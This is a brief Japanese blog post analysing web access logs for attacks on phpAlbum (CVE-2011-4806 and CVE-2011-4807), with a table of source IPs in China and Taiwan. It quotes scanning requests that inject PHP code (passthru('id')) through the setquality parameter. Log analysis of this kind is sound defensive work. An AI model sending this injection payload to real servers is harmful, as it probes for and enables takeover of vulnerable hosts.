最近のアクセスログ - phpalbumへの攻撃
Published: 2011/12/28
これも多く残ってます。
phpalbumへの攻撃です。
- CVE-2011-4806
- CVE-2011-4807
このようなリクエスト。スキャン用。
/apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
passthruファンクションを使って脆弱性があるサーバーかしらべて、のっとった後はマルウェアをこのサーバーに設置することが目的?
攻撃元はやはりアジア。
IP | name | AS | AS name | 国 | |
---|---|---|---|---|---|
59.108.108.100 | NONE | 4847 | CNIX-AP_China_Networks_Inter-Exchange | CN | |
202.100.80.21 | NONE | 4134 | CHINANET-BACKBONE_No.31Jin-rong_Street | CN | |
203.72.59.6 | NONE | 1659 | ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_Center | TW |
by jyake